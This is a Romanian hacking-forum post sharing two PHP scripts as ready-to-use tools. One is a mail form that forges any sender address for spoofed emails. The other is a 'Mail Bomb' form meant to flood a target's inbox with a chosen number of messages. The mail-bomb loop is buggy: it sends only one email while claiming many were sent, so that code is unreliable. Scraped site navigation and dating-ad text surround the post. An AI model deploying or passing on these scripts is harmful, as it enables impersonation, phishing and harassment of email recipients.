Deep Blue Team
Bine Ati venit.Noi , DBT vrem sa (va) invatam cat mai multe despre NET
|
Nou pe simpatie: theo23 24 ani
 | Femeie 24 ani Arges cauta Barbat 26 - 45 ani |
|
|
Deep Blue TeamReguliInregistrareLoginPozeNu sunteti logat. Lista Forumurilor Pe Tematici
|
| #1 |
Y2KAbYSSDin: Undeva Prin Pushcarie :|
Postari: 46
|
|
1)
Big Chuck Script :
Code:
<center>
<br><br><br><br><br>
<?php
if(!isset($_GET['action'])) $_GET['action']='';
switch($_GET['action'])
{
case '':
echo '<form action="index.php?action=send" method="post">
From :<input type="text" name="from"><br>
To :<input type="text" name="to"><br>
Subject :<input type="text" name="subject"><br>
Mesaj :<br><textarea cols=30 rows=10 name="mesaj">Scrie aici continutul mailului ! </textarea><br>
<input type="submit" value="Send">
<input type="reset" value="Reset"><br><br>Made by Big Chuck © 2006 aproape 07!from hacking.3xforum.ro.';
break;
case 'send':
if(($_POST['from']=="") || ($_POST['to']=="") ||($_POST['subject']=="") ||($_POST['mesaj']==""))
{
echo 'Completeaza toate casutele ! Apasa <a href="index.php"> aici </a> pentru a te intoarce !';
}
else
{
$from=$_POST['from'];
$to=$_POST['to'];
$subject=$_POST['subject'];
$mesaj=$_POST['mesaj'];
$headers = 'From:'.$from."rn";
mail($to, $subject, $mesaj, $headers);
echo 'Mail from '.$from.' to '.$to.' successful sended !<br>Made by Big Chuck © 2006 aproape 07!from hacking.3xforum.ro.';
}
break;
}
?>
</center> |
trebuie
salvat in index.php
2) Y2K Script for Mail Bombs
Code:
<title>Mail Bomb</title><br><br><br><br><br><center><?php
if (isset($_GET['email'])) {
$email = $_GET['email'];
$message = $_GET['message'];
$from = $_GET['from'];
$subject = $_GET['subject'];
$b = $_GET['nr'];
for ($blablaa = $b; $blablaa <= $b; $blablaa++)
{ mail( $email, $subject, $message, "From: $from" ); }
print "Un numar de $b email`uri au fost trimise catre $email cu suces.<br>Adica Un MailBomb de $b Email`uri Au Fost Trimise Catre $email Cu Suces :)) ";
}
else {
?>
<form method="get" action="index.php">
To Email: <input name="email" type="text"><br>
From Email: <input name="from" type="text"><br>
Subject: <input name="subject" type="text"><br>
Number Off Emails: <input name="nr" type="text"><br>
Message:<textarea name="message" rows="5" cols="37"></textarea><br>
<input type="reset" value="ReSeTeaZa">
<input type="submit" value="MailBomb"><br><br>© Y2K
</form>
<?php
}
?></center> |
trebuie
salvat in index.php
_______________________________________
 Sa Hackereshti E Un Vis ! Dar Sa Fii Hackerit E Un Coshmar !
|
|
| |
|